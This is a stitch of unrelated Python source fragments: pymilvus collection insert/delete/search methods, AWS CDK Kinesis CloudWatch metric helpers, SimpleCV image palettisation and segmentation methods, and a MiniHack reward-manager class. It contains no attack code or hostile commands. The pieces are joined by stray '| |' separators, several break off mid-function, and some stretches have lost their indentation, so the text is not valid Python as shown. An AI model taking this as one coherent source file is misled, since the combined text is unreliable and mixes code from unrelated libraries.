    handler = self._get_connection()
    handler.release_collection(self._name, timeout=timeout, **kwargs)
def insert(self, data, partition_name=None, timeout=None, **kwargs):
    """
    Insert data into the collection.

    :param data: The specified data to insert, the dimension of data needs to align with column
                 number
    :type data: list-like(list, tuple) object or pandas.DataFrame
    :param partition_name: The partition name which the data will be inserted to, if partition
                           name is not passed, then the data will be inserted to "_default"
                           partition
    :type partition_name: str
    :param timeout:
        * *timeout* (``float``) --
          An optional duration of time in seconds to allow for the RPC. If timeout
          is set to None, the client keeps waiting until the server responds or an error occurs.
    :param kwargs:
        * *_async* (``bool``) --
          Indicate if invoke asynchronously; when True a MutationFuture is returned
          instead of a MutationResult.
    :return: A MutationResult wrapping the server response, or a MutationFuture when
             ``_async`` is True.
    :raises CollectionNotExistException: If the specified collection does not exist.
    :raises ParamError: If input parameters are invalid.
    :raises BaseException: If the specified partition does not exist.

    :example:
        >>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
        >>> import random
        >>> connections.connect()
        <pymilvus.client.stub.Milvus object at 0x7f8579002dc0>
        >>> schema = CollectionSchema([
        ...     FieldSchema("film_id", DataType.INT64, is_primary=True),
        ...     FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
        ... ])
        >>> collection = Collection("test_collection_insert", schema)
        >>> data = [
        ...     [random.randint(1, 100) for _ in range(10)],
        ...     [[random.random() for _ in range(2)] for _ in range(10)],
        ... ]
        >>> collection.insert(data)
        >>> collection.num_entities
        10
    """
    # A None payload is treated as a no-op: wrap it instead of raising.
    if data is None:
        return MutationResult(data)
    if not self._check_insert_data_schema(data):
        raise SchemaNotReadyException(0, ExceptionsMessage.TypeOfDataAndSchemaInconsistent)
    conn = self._get_connection()
    # Convert the column-oriented input into the wire format the server expects.
    entities = Prepare.prepare_insert_data(data, self._schema)
    res = conn.insert(collection_name=self._name, entities=entities, ids=None,
                      partition_name=partition_name, timeout=timeout, **kwargs)
    if kwargs.get("_async", False):
        return MutationFuture(res)
    return MutationResult(res)
def delete(self, expr, partition_name=None, timeout=None, **kwargs):
    """
    Delete entities with an expression condition.
    And return results to show which primary key is deleted successfully

    :param expr: The expression to specify entities to be deleted
    :type expr: str
    :param partition_name: Name of partitions that contain entities
    :type partition_name: str
    :param timeout: An optional duration of time in seconds to allow for the RPC. When timeout
                    is set to None, client waits until server response or error occur
    :type timeout: float
    :return: A MutationResult wrapping the server response (or a MutationFuture when
             ``_async`` is True); it reports the primary keys deleted.
    :rtype: MutationResult
    :raises:
        RpcError: If gRPC encounter an error
        ParamError: If parameters are invalid
        BaseException: If the return result from server is not ok

    :example:
        >>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
        >>> import random
        >>> connections.connect()
        >>> schema = CollectionSchema([
        ...     FieldSchema("film_id", DataType.INT64, is_primary=True),
        ...     FieldSchema("film_date", DataType.INT64),
        ...     FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
        ... ])
        >>> collection = Collection("test_collection_query", schema)
        >>> # insert
        >>> data = [
        ...     [i for i in range(10)],
        ...     [i + 2000 for i in range(10)],
        ...     [[random.random() for _ in range(2)] for _ in range(10)],
        ... ]
        >>> collection.insert(data)
        >>> collection.num_entities
        >>> expr = "film_id in [ 0, 1 ]"
        >>> res = collection.delete(expr)
        >>> assert len(res) == 2
        >>> print(f"- Deleted entities: {res}")
        - Deleted entities: [0, 1]
    """
    conn = self._get_connection()
    res = conn.delete(collection_name=self._name, expr=expr,
                      partition_name=partition_name, timeout=timeout, **kwargs)
    # _async callers get a future; synchronous callers get the wrapped result.
    if kwargs.get("_async", False):
        return MutationFuture(res)
    return MutationResult(res)
def search(self, data, anns_field, param, limit, expr=None, partition_names=None,
           output_fields=None, timeout=None, round_decimal=-1, **kwargs):
    """
    Conducts a vector similarity search with an optional boolean expression as filter.

    :param data: The vectors of search data, the length of data is number of query (nq), the
                 dim of every vector in data must be equal to vector field's of collection.
    :type data: list[list[float]]
    :param anns_field: The vector field used to search of collection.
    :type anns_field: str
    :param param: The parameters of search, such as ``nprobe``.
    :type param: dict
    :param limit: The max number of returned record, also known as ``topk``.
    :type limit: int
    :param expr: The boolean expression used to filter attribute.
    :type expr: str
    :param partition_names: The names of partitions to search.
    :type partition_names: list[str]
    :param output_fields: The fields to return in the search result, not supported now.
    :type output_fields: list[str]
    :param timeout: An optional duration of time in seconds to allow for the RPC. When timeout
                    is set to None, client waits until server response or error occur.
    :type timeout: float
    :param round_decimal: The specified number of decimal places of returned distance
    :type round_decimal: int
    :param kwargs:
        * *_async* (``bool``) --
          Indicate if invoke asynchronously. When value is true, method returns a
          SearchFuture object; otherwise, method returns results from server directly.
        * *_callback* (``function``) --
          The callback function which is invoked after server response successfully.
          It functions only if _async is set to True.
        * *guarantee_timestamp* (``int``) --
          This function instructs Milvus to see all operations performed before a provided timestamp. If no
          such timestamp is provided, then Milvus will search all operations performed to date.
        * *travel_timestamp* (``int``) --
          Users can specify a timestamp in a search to get results based on a data view
          at a specified point in time.
    :return: SearchResult:
        SearchResult is iterable and is a 2d-array-like class, the first dimension is
        the number of vectors to query (nq), the second dimension is the number of limit(topk).
    :rtype: SearchResult
    :raises RpcError: If gRPC encounter an error.
    :raises ParamError: If parameters are invalid.
    :raises DataTypeNotMatchException: If wrong type of param is passed.
    :raises BaseException: If the return result from server is not ok.

    :example:
        >>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
        >>> import random
        >>> connections.connect()
        <pymilvus.client.stub.Milvus object at 0x7f8579002dc0>
        >>> schema = CollectionSchema([
        ...     FieldSchema("film_id", DataType.INT64, is_primary=True),
        ...     FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
        ... ])
        >>> collection = Collection("test_collection_search", schema)
        >>> # insert
        >>> data = [
        ...     [i for i in range(10)],
        ...     [[random.random() for _ in range(2)] for _ in range(10)],
        ... ]
        >>> collection.insert(data)
        >>> collection.num_entities
        10
        >>> collection.load()
        >>> # search
        >>> search_param = {
        ...     "data": [[1.0, 1.0]],
        ...     "anns_field": "films",
        ...     "param": {"metric_type": "L2"},
        ...     "limit": 2,
        ...     "expr": "film_id > 0",
        ... }
        >>> res = collection.search(**search_param)
        >>> assert len(res) == 1
        >>> hits = res[0]
        >>> assert len(hits) == 2
        >>> print(f"- Total hits: {len(hits)}, hits ids: {hits.ids} ")
        - Total hits: 2, hits ids: [8, 5]
        >>> print(f"- Top1 hit id: {hits[0].id}, distance: {hits[0].distance}, score: {hits[0].score} ")
        - Top1 hit id: 8, distance: 0.10143111646175385, score: 0.10143111646175385
    """
    # Validate the filter expression type eagerly, before any RPC is made.
    if expr is not None and not isinstance(expr, str):
        raise DataTypeNotMatchException(0, ExceptionsMessage.ExprType % type(expr))
    conn = self._get_connection()
    res = conn.search(self._name, data, anns_field, param, limit, expr,
                      partition_names, output_fields, timeout, round_decimal, **kwargs)
    # _async callers get a future; synchronous callers get the wrapped result.
    if kwargs.get("_async", False):
        return SearchFuture(res)
    return SearchResult(res)
def query(self, expr, output_fields=None, partition_names=None, timeout=None):
"""
Query with a set of criteria, and results in a list of records that match the query exactly.
:param expr: The query expression
:type expr: str
:param output_fields: A list of fields to return
:type output_fields: list[str]
:param partition_names: Name of partitions that contain entities
| |
when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
'''
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
dimensions_map=dimensions_map,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return typing.cast(aws_cdk.aws_cloudwatch.Metric, jsii.invoke(self, "metricIncomingRecords", [props]))
@jsii.member(jsii_name="metricPutRecordBytes")
def metric_put_record_bytes(
    self,
    *,
    account: typing.Optional[builtins.str] = None,
    color: typing.Optional[builtins.str] = None,
    dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
    dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
    label: typing.Optional[builtins.str] = None,
    period: typing.Optional[aws_cdk.core.Duration] = None,
    region: typing.Optional[builtins.str] = None,
    statistic: typing.Optional[builtins.str] = None,
    unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
    '''The number of bytes put to the Kinesis stream using the PutRecord operation over the specified time period.

    Defaults to the average over 5 minutes; pass ``statistic`` and/or ``period``
    to change the aggregation.

    :param account: Account which this metric comes from. Default: - Deployment account.
    :param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), used when this metric is rendered on a graph. Default: - Automatic color
    :param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
    :param dimensions_map: Dimensions of the metric. Default: - No dimensions.
    :param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
    :param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
    :param region: Region which this metric comes from. Default: - Deployment region.
    :param statistic: Aggregation function: "Minimum"/"min", "Maximum"/"max", "Average"/"avg", "Sum"/"sum", "SampleCount"/"n" or "pNN.NN". Default: Average
    :param unit: Unit used to filter the metric stream; only datums emitted with this unit are considered. Default: - All metric datums in the given metric stream
    '''
    metric_options = aws_cdk.aws_cloudwatch.MetricOptions(
        account=account,
        color=color,
        dimensions=dimensions,
        dimensions_map=dimensions_map,
        label=label,
        period=period,
        region=region,
        statistic=statistic,
        unit=unit,
    )
    return typing.cast(
        aws_cdk.aws_cloudwatch.Metric,
        jsii.invoke(self, "metricPutRecordBytes", [metric_options]),
    )
@jsii.member(jsii_name="metricPutRecordLatency")
def metric_put_record_latency(
    self,
    *,
    account: typing.Optional[builtins.str] = None,
    color: typing.Optional[builtins.str] = None,
    dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
    dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
    label: typing.Optional[builtins.str] = None,
    period: typing.Optional[aws_cdk.core.Duration] = None,
    region: typing.Optional[builtins.str] = None,
    statistic: typing.Optional[builtins.str] = None,
    unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
    '''The time taken per PutRecord operation, measured over the specified time period.

    Defaults to the average over 5 minutes; pass ``statistic`` and/or ``period``
    to change the aggregation.

    :param account: Account which this metric comes from. Default: - Deployment account.
    :param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), used when this metric is rendered on a graph. Default: - Automatic color
    :param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
    :param dimensions_map: Dimensions of the metric. Default: - No dimensions.
    :param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
    :param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
    :param region: Region which this metric comes from. Default: - Deployment region.
    :param statistic: Aggregation function: "Minimum"/"min", "Maximum"/"max", "Average"/"avg", "Sum"/"sum", "SampleCount"/"n" or "pNN.NN". Default: Average
    :param unit: Unit used to filter the metric stream; only datums emitted with this unit are considered. Default: - All metric datums in the given metric stream
    '''
    metric_options = aws_cdk.aws_cloudwatch.MetricOptions(
        account=account,
        color=color,
        dimensions=dimensions,
        dimensions_map=dimensions_map,
        label=label,
        period=period,
        region=region,
        statistic=statistic,
        unit=unit,
    )
    return typing.cast(
        aws_cdk.aws_cloudwatch.Metric,
        jsii.invoke(self, "metricPutRecordLatency", [metric_options]),
    )
@jsii.member(jsii_name="metricPutRecordsBytes")
def metric_put_records_bytes(
    self,
    *,
    account: typing.Optional[builtins.str] = None,
    color: typing.Optional[builtins.str] = None,
    dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
    dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
    label: typing.Optional[builtins.str] = None,
    period: typing.Optional[aws_cdk.core.Duration] = None,
    region: typing.Optional[builtins.str] = None,
    statistic: typing.Optional[builtins.str] = None,
    unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
    '''The number of bytes put to the Kinesis stream using the PutRecords operation over the specified time period.

    Defaults to the average over 5 minutes; pass ``statistic`` and/or ``period``
    to change the aggregation.

    :param account: Account which this metric comes from. Default: - Deployment account.
    :param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), used when this metric is rendered on a graph. Default: - Automatic color
    :param dimensions: (deprecated) Dimensions of the metric. Default: - No dimensions.
    :param dimensions_map: Dimensions of the metric. Default: - No dimensions.
    :param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
    :param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
    :param region: Region which this metric comes from. Default: - Deployment region.
    :param statistic: Aggregation function: "Minimum"/"min", "Maximum"/"max", "Average"/"avg", "Sum"/"sum", "SampleCount"/"n" or "pNN.NN". Default: Average
    :param unit: Unit used to filter the metric stream; only datums emitted with this unit are considered. Default: - All metric datums in the given metric stream
    '''
    metric_options = aws_cdk.aws_cloudwatch.MetricOptions(
        account=account,
        color=color,
        dimensions=dimensions,
        dimensions_map=dimensions_map,
        label=label,
        period=period,
        region=region,
        statistic=statistic,
        unit=unit,
    )
    return typing.cast(
        aws_cdk.aws_cloudwatch.Metric,
        jsii.invoke(self, "metricPutRecordsBytes", [metric_options]),
    )
@jsii.member(jsii_name="metricPutRecordsFailedRecords")
def metric_put_records_failed_records(
self,
*,
account: typing.Optional[builtins.str] = None,
color: typing.Optional[builtins.str] = None,
dimensions: typing.Optional[typing.Mapping[builtins.str, typing.Any]] = None,
dimensions_map: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
label: typing.Optional[builtins.str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[builtins.str] = None,
statistic: typing.Optional[builtins.str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
'''The number of records rejected due to internal failures in a PutRecords operation per Kinesis data stream, measured over the specified time period.
Occasional internal failures are to be expected and should be retried.
The metric defaults to average over 5 minutes, it can be changed by passing ``statistic`` and ``period`` properties.
:param account: Account which this metric comes from. Default: - Deployment account.
| |
roi = (0,int(idxL),size[0],int(idxH-idxL))
cv.SetImageROI(pal,roi)
color = np.array((float(self._mPalette[i][2]),float(self._mPalette[i][1]),float(self._mPalette[i][0])))
cv.AddS(pal,color,pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
else: # do hue
if( horizontal ):
if( size[0] == -1 or size[1] == -1 ):
size = (int(self.width),int(self.height*.1))
pal = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Zero(pal)
idxL = 0
idxH = 0
for i in range(0,bins):
idxH =np.clip(idxH+(self._mPalettePercentages[i]*float(size[0])),0,size[0]-1)
roi = (int(idxL),0,int(idxH-idxL),size[1])
cv.SetImageROI(pal,roi)
cv.AddS(pal,float(self._mPalette[i]),pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
else:
if( size[0] == -1 or size[1] == -1 ):
size = (int(self.width*.1),int(self.height))
pal = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Zero(pal)
idxL = 0
idxH = 0
for i in range(0,bins):
idxH =np.clip(idxH+self._mPalettePercentages[i]*size[1],0,size[1]-1)
roi = (0,int(idxL),size[0],int(idxH-idxL))
cv.SetImageROI(pal,roi)
cv.AddS(pal,float(self._mPalette[i]),pal)
cv.ResetImageROI(pal)
idxL = idxH
retVal = Image(pal)
return retVal
def palettize(self,bins=10,hue=False):
    """
    **SUMMARY**

    This method analyzes an image and determines the most common colors using a k-means algorithm.
    The method then goes through and replaces each pixel with the centroid of the clusters found
    by k-means. This reduces the number of colors in an image to the number of bins. This can be particularly
    handy for doing segmentation based on color.

    **PARAMETERS**

    * *bins* - an integer number of bins into which to divide the colors in the image.
    * *hue* - if hue is true we only cluster on the image hue values.

    **RETURNS**

    An image matching the original where each color is replaced with its palette value.

    **EXAMPLE**

    >>> img2 = img1.palettize()
    >>> img2.show()

    **NOTES**

    The hue calculation should be significantly faster than the generic RGB calculation as
    it works in a one dimensional space. Sometimes the underlying scipy method freaks out
    about k-means initialization with the following warning:

    .. Warning::
      UserWarning: One of the clusters is empty. Re-run kmean with a different initialization.

    This shouldn't be a real problem.

    **SEE ALSO**

    :py:meth:`rePalette`
    :py:meth:`drawPaletteColors`
    :py:meth:`palettize`
    :py:meth:`getPalette`
    :py:meth:`binarizeFromPalette`
    :py:meth:`findBlobsFromPalette`
    """
    retVal = None
    # Build self._mPalette / self._mPaletteMembers for the requested bin
    # count; _mPaletteMembers maps each pixel to its cluster index.
    self._generatePalette(bins,hue)
    if( hue ):
        # 1-D hue palette: look up each pixel's cluster hue, then rebuild
        # the 2-D image. The double [::-1] reversal plus the -90 degree
        # rotation undo the flattening order used during clustering.
        derp = self._mPalette[self._mPaletteMembers]
        retVal = Image(derp[::-1].reshape(self.height,self.width)[::-1])
        retVal = retVal.rotate(-90,fixed=False)
    else:
        # NOTE(review): reshape uses (width, height, 3) — presumably matching
        # the column-major pixel order this class uses internally; confirm
        # against _generatePalette before changing.
        retVal = Image(self._mPalette[self._mPaletteMembers].reshape(self.width,self.height,3))
    return retVal
def findBlobsFromPalette(self, palette_selection, dilate = 0, minsize=5, maxsize=0,appx_level=3):
"""
**SUMMARY**
This method attempts to use palettization to do segmentation and behaves similar to the
findBlobs blob in that it returs a feature set of blob objects. Once a palette has been
extracted using getPalette() we can then select colors from that palette to be labeled
white within our blobs.
**PARAMETERS**
* *palette_selection* - color triplets selected from our palette that will serve turned into blobs
These values can either be a 3xN numpy array, or a list of RGB triplets.
* *dilate* - the optional number of dilation operations to perform on the binary image
prior to performing blob extraction.
* *minsize* - the minimum blob size in pixels
* *maxsize* - the maximim blob size in pixels.
* *appx_level* - The blob approximation level - an integer for the maximum distance between the true edge and the
approximation edge - lower numbers yield better approximation.
**RETURNS**
If the method executes successfully a FeatureSet of Blobs is returned from the image. If the method
fails a value of None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> p = img.getPalette()
>>> blobs = img.findBlobsFromPalette( (p[0],p[1],[6]) )
>>> blobs.draw()
>>> img.show()
**SEE ALSO**
:py:meth:`rePalette`
:py:meth:`drawPaletteColors`
:py:meth:`palettize`
:py:meth:`getPalette`
:py:meth:`binarizeFromPalette`
:py:meth:`findBlobsFromPalette`
"""
#we get the palette from find palete
#ASSUME: GET PALLETE WAS CALLED!
bwimg = self.binarizeFromPalette(palette_selection)
if( dilate > 0 ):
bwimg =bwimg.dilate(dilate)
if (maxsize == 0):
maxsize = self.width * self.height
#create a single channel image, thresholded to parameters
blobmaker = BlobMaker()
blobs = blobmaker.extractFromBinary(bwimg,
self, minsize = minsize, maxsize = maxsize,appx_level=appx_level)
if not len(blobs):
return None
return blobs
def binarizeFromPalette(self, palette_selection):
"""
**SUMMARY**
This method uses the color palette to generate a binary (black and white) image. Palaette selection
is a list of color tuples retrieved from img.getPalette(). The provided values will be drawn white
while other values will be black.
**PARAMETERS**
palette_selection - color triplets selected from our palette that will serve turned into blobs
These values can either be a 3xN numpy array, or a list of RGB triplets.
**RETURNS**
This method returns a black and white images, where colors that are close to the colors
in palette_selection are set to white
**EXAMPLE**
>>> img = Image("lenna")
>>> p = img.getPalette()
>>> b = img.binarizeFromPalette( (p[0],p[1],[6]) )
>>> b.show()
**SEE ALSO**
:py:meth:`rePalette`
:py:meth:`drawPaletteColors`
:py:meth:`palettize`
:py:meth:`getPalette`
:py:meth:`binarizeFromPalette`
:py:meth:`findBlobsFromPalette`
"""
#we get the palette from find palete
#ASSUME: GET PALLETE WAS CALLED!
if( self._mPalette == None ):
logger.warning("Image.binarizeFromPalette: No palette exists, call getPalette())")
return None
retVal = None
img = self.palettize(self._mPaletteBins, hue=self._mDoHuePalette)
if( not self._mDoHuePalette ):
npimg = img.getNumpy()
white = np.array([255,255,255])
black = np.array([0,0,0])
for p in palette_selection:
npimg = np.where(npimg != p,npimg,white)
npimg = np.where(npimg != white,black,white)
retVal = Image(npimg)
else:
npimg = img.getNumpy()[:,:,1]
white = np.array([255])
black = np.array([0])
for p in palette_selection:
npimg = np.where(npimg != p,npimg,white)
npimg = np.where(npimg != white,black,white)
retVal = Image(npimg)
return retVal
def skeletonize(self, radius = 5):
"""
**SUMMARY**
Skeletonization is the process of taking in a set of blobs (here blobs are white
on a black background) and finding a squigly line that would be the back bone of
the blobs were they some sort of vertebrate animal. Another way of thinking about
skeletonization is that it finds a series of lines that approximates a blob's shape.
A good summary can be found here:
http://www.inf.u-szeged.hu/~palagyi/skel/skel.html
**PARAMETERS**
* *radius* - an intenger that defines how roughly how wide a blob must be to be added
to the skeleton, lower values give more skeleton lines, higher values give
fewer skeleton lines.
**EXAMPLE**
>>> cam = Camera()
>>> while True:
>>> img = cam.getImage()
>>> b = img.binarize().invert()
>>> s = img.skeletonize()
>>> r = b-s
>>> r.show()
**NOTES**
This code was a suggested improvement by <NAME>, check out his awesome blog here:
http://alexbw.posterous.com/
"""
img = self.toGray().getNumpy()[:,:,0]
distance_img = ndimage.distance_transform_edt(img)
morph_laplace_img = ndimage.morphological_laplace(distance_img, (radius, radius))
skeleton = morph_laplace_img < morph_laplace_img.min()/2
retVal = np.zeros([self.width,self.height])
retVal[skeleton] = 255
return Image(retVal)
def smartThreshold(self, mask=None, rect=None):
"""
**SUMMARY**
smartThreshold uses a method called grabCut, also called graph cut, to
automagically generate a grayscale mask image. The dumb version of threshold
just uses color, smartThreshold looks at
both color and edges to find a blob. To work smartThreshold needs either a
rectangle that bounds the object you want to find, or a mask. If you use
a rectangle make sure it holds the complete object. In the case of a mask, it
need not be a normal binary mask, it can have the normal white foreground and black
background, but also a light and dark gray values that correspond to areas
that are more likely to be foreground and more likely to be background. These
values can be found in the color class as Color.BACKGROUND, Color.FOREGROUND,
Color.MAYBE_BACKGROUND, and Color.MAYBE_FOREGROUND.
**PARAMETERS**
* *mask* - A grayscale mask the same size as the image using the 4 mask color values
* *rect* - A rectangle tuple of the form (x_position,y_position,width,height)
**RETURNS**
A grayscale image with the foreground / background values assigned to:
* BACKGROUND = (0,0,0)
* MAYBE_BACKGROUND = (64,64,64)
* MAYBE_FOREGROUND = (192,192,192)
* FOREGROUND = (255,255,255)
**EXAMPLE**
>>> img = Image("RatTop.png")
>>> mask = Image((img.width,img.height))
>>> mask.dl().circle((100,100),80,color=Color.MAYBE_BACKGROUND,filled=True)
>>> mask.dl().circle((100,100),60,color=Color.MAYBE_FOREGROUND,filled=True)
>>> mask.dl().circle((100,100),40,color=Color.FOREGROUND,filled=True)
>>> mask = mask.applyLayers()
>>> new_mask = img.smartThreshold(mask=mask)
>>> new_mask.show()
**NOTES**
http://en.wikipedia.org/wiki/Graph_cuts_in_computer_vision
**SEE ALSO**
:py:meth:`smartFindBlobs`
"""
try:
import cv2
except:
logger.warning("Can't Do GrabCut without OpenCV >= 2.3.0")
return
retVal = []
if( mask is not None ):
bmp = mask._getGrayscaleBitmap()
# translate the human readable images | |
event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [
f"This {name} is delicious",
"Blecch! Rotten food!",
"last bite of your meal",
]
if name == "apple":
msgs.append("Delicious! Must be a Macintosh!")
msgs.append("Core dumped.")
if name == "pear":
msgs.append("Core dumped.")
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_wield_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specific weapon is wielded.
Args:
name (str):
The name of the weapon to be wielded.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [
f"{name} wields itself to your hand!",
f"{name} (weapon in hand)",
]
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_wear_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specific armor is worn.
Args:
name (str):
The name of the armor to be worn.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
msgs = [f"You are now wearing a {name}"]
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_amulet_event(
self,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when an amulet is worn.
Args:
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
["amulet (being worn)."],
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_kill_event(
self,
name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when a specified monster is killed.
Args:
name (str):
The name of the monster to be killed.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
[f"You kill the {name}"],
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_message_event(
self,
msgs: List[str],
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered when any of the given messages are seen.
Args:
msgs (List[str]):
The name of the monster to be killed.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_message_event(
msgs, reward, repeatable, terminal_required, terminal_sufficient
)
def add_positional_event(
self,
place_name: str,
action_name: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on taking a given action at a given place.
Args:
place_name (str):
The name of the place to trigger the event.
action_name (int):
The name of the action to trigger the event.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self._add_loc_action_event(
place_name,
action_name,
reward,
repeatable,
terminal_required,
terminal_sufficient,
)
def add_coordinate_event(
self,
coordinates: Tuple[int, int],
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on when reaching the specified
coordinates.
Args:
coordinates (Tuple[int, int]):
The coordinates to be reached (tuple of ints).
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self.add_event(
CoordEvent(
reward,
repeatable,
terminal_required,
terminal_sufficient,
coordinates=coordinates,
)
)
def add_location_event(
self,
location: str,
reward=1,
repeatable=False,
terminal_required=True,
terminal_sufficient=False,
):
"""Add event which is triggered on reaching a specified location.
Args:
name (str):
The name of the location to be reached.
reward (float):
The reward for this event. Defaults to 1.
repeatable (bool):
Whether this event can be triggered multiple times. Defaults to
False.
terminal_required (bool):
Whether this event is required for termination. Defaults to
True.
terminal_sufficient (bool):
Whether this event is sufficient for termination. Defaults to
False.
"""
self.add_event(
LocEvent(
reward,
repeatable,
terminal_required,
terminal_sufficient,
loc=location,
)
)
def _set_achieved(self, event: Event) -> float:
if not event.repeatable:
event.achieved = True
return event.reward
def _standing_on_top(self, env, name):
"""Returns whether the agents is standing on top of the given object.
The object name (e.g. altar, sink, fountain) must exist on the map.
Args:
env (MiniHack):
The environment object.
name (str):
The name of the object.
Returns:
bool: True if the object name is not in the screen descriptions
with agent info taking the space of the corresponding tile rather
than the object).
"""
return not env.screen_contains(name)
def check_episode_end_call(
self, env, previous_observation, action, observation
) -> bool:
reward = 0.0
for event in self.events:
if event.achieved:
continue
reward += event.check(
env, previous_observation, action, observation
)
for custom_reward_function in self.custom_reward_functions:
reward += custom_reward_function(
env, previous_observation, action, observation
)
self._reward += reward
return self._check_complete()
def _check_complete(self) -> bool:
"""Checks whether the episode is complete.
Requires any event which is sufficient to be achieved, OR all required
events to be achieved."""
result = True
for event in self.events:
# This event is enough, we're done
if event.achieved and event.terminal_sufficient:
return True
# We need this event and we haven't done it, we're not done
if not event.achieved and event.terminal_required:
result = False
# We've achieved all terminal_required events, we're done
return result
def collect_reward(self) -> float:
result = self._reward
self._reward = 0.0
return result
def reset(self):
self._reward = 0.0
for event in self.events:
event.reset()
class SequentialRewardManager(RewardManager):
    """Reward manager requiring events to be completed strictly in the order
    they were added; ``terminal_required`` and ``terminal_sufficient`` are
    ignored.
    """
    def __init__(self):
        # Index of the next event that must be achieved.
